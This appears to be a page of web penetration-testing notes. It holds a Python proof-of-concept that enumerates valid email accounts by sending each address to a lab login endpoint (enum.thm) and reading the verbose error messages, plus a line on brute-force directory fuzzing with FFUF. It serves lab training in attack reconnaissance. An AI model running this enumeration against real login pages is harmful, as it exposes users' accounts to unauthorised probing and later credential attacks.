Web Applications/EnumerationEnumerating EmailsA python script to enumerate emailsPOC importrequests importsys def check_email(email): url = 'http://enum.thm/labs/verbose_login/functions.php' # Location of the login function headers = { 'Host':'enum.thm', 'User-Agent':'Mozilla/5.0 (X11; Linuxaarch64; rv:102.0) Gecko/20100101 Firefox/102.0', 'Accept':'application/json, text/javascript, */*; q=0.01', 'Accept-Language':'en-US,en;q=0.5', 'Accept-Encoding':'gzip, deflate', 'Content-Type':'application/x-www-form-urlencoded; charset=UTF-8', 'X-Requested-With':'XMLHttpRequest', 'Origin':'http://enum.thm', 'Connection':'close', 'Referer':'http://enum.thm/labs/verbose_login/', } data = { 'username':email, 'password':'password', # Use a random password as we are only checking the email 'function':'login' } response = requests.post(url,headers=headers,data=data) return response.json() def enumerate_emails(email_file): valid_emails = [] invalid_error = "Email does not exist" # Error message for invalid emails with open(email_file,'r') as file: emails = file.readlines() for email in emails: email = email.strip() # Remove any leading/trailing whitespace if email: response_json = check_email(email) if response_json['status'] == 'error' and invalid_error in response_json['message']: print(f"[INVALID] {email}") else: print(f"[VALID] {email}") valid_emails.append(email) return valid_emails if __name__ == "__main__": if len(sys.argv) != 2: print("Usage: python3 script.py <email_list_file>") sys.exit(1) email_file = sys.argv[1] valid_emails = enumerate_emails(email_file) print("\nValid emails found:") for valid_email in valid_emails: print(valid_email)DirectoriesCommonly used ways of finding directories on a given domain.FUFFFuzz Faster U Fool is an open-source web fuzzing tool designed for discovering hidden files and directories on web servers by employing brute-force techniques